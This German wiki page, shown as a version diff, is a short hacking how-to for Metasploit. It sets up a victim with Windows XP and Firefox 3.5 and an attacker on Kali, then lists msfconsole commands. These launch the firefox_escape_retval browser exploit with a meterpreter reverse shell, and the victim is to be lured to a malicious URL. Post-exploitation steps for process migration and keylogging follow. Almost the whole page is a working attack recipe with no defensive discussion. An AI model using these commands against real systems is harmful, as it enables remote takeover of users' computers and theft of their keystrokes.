Metasploit: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
David (Diskussion | Beiträge) |
David (Diskussion | Beiträge) |
||
| Zeile 7: | Zeile 7: | ||
*http://www.admin-magazin.de/Das-Heft/2009/01/Security-Auditing-mit-Metasploit/%28language%29/ger-DE | *http://www.admin-magazin.de/Das-Heft/2009/01/Security-Auditing-mit-Metasploit/%28language%29/ger-DE | ||
*http://www.metasploit.com/ | *http://www.metasploit.com/ | ||
| − | http://192.168. | + | =Setup opfer= |
| + | Winxp Service pack 3 | ||
| + | Firefox 3.5 | ||
| + | |||
| + | =Setup Hacker= | ||
| + | Kali Linux | ||
| + | ip: 192.168.242.53 | ||
| + | |||
| + | =vorgehen= | ||
| + | starte metasploit | ||
| + | msfconsole | ||
| + | |||
| + | use exploit/multi/browser/firefox_escape_retval | ||
| + | set payload windows/meterpreter/reverse_tcp/ | ||
| + | set lhost 192.168.242.53 (lokaler Host) | ||
| + | set svrhost 192.168.242.53 (HTTP-Server IP) | ||
| + | set svrport 8888 (HTTP-Server Port) | ||
| + | set lport 4444 (lokaler Port) | ||
| + | set uripath /hack (optional) | ||
| + | exploit | ||
| + | |||
| + | jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack | ||
| + | wenn wir meterpreter > sehen hat der exploit funktioniert | ||
| + | |||
| + | session - i 1 (in die session gehen) | ||
| + | sessions -h (zeigt optionen) | ||
| + | ps (zeigt prozesse) | ||
| + | migrate PSID (verschiebt in den prozess Z.b explorer.exe) | ||
| + | getpid (zeigt momentanen prozess) | ||
| + | keyscan_start (startet den keyloger) | ||
| + | keyscan_dump (zeigt aufzeichnungen) | ||
| + | keyscan_stop (stopt keyloger) | ||
Version vom 19. Oktober 2015, 13:57 Uhr
Links
- http://null-byte.wonderhowto.com/how-to/hack-like-pro-hack-shellshock-vulnerability-0157651/
- http://www.explorehacking.com/2011/03/metasploit-tutorial-with-example.html
- https://jonathansblog.co.uk/metasploit-tutorial-for-beginners
- https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/
- http://www.admin-magazin.de/Das-Heft/2009/01/Security-Auditing-mit-Metasploit/%28language%29/ger-DE
- http://www.metasploit.com/
Setup opfer
Winxp Service pack 3 Firefox 3.5
Setup Hacker
Kali Linux ip: 192.168.242.53
vorgehen
starte metasploit
msfconsole
use exploit/multi/browser/firefox_escape_retval set payload windows/meterpreter/reverse_tcp/ set lhost 192.168.242.53 (lokaler Host) set svrhost 192.168.242.53 (HTTP-Server IP) set svrport 8888 (HTTP-Server Port) set lport 4444 (lokaler Port) set uripath /hack (optional) exploit
jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack wenn wir meterpreter > sehen hat der exploit funktioniert
session - i 1 (in die session gehen) sessions -h (zeigt optionen) ps (zeigt prozesse) migrate PSID (verschiebt in den prozess Z.b explorer.exe) getpid (zeigt momentanen prozess) keyscan_start (startet den keyloger) keyscan_dump (zeigt aufzeichnungen) keyscan_stop (stopt keyloger)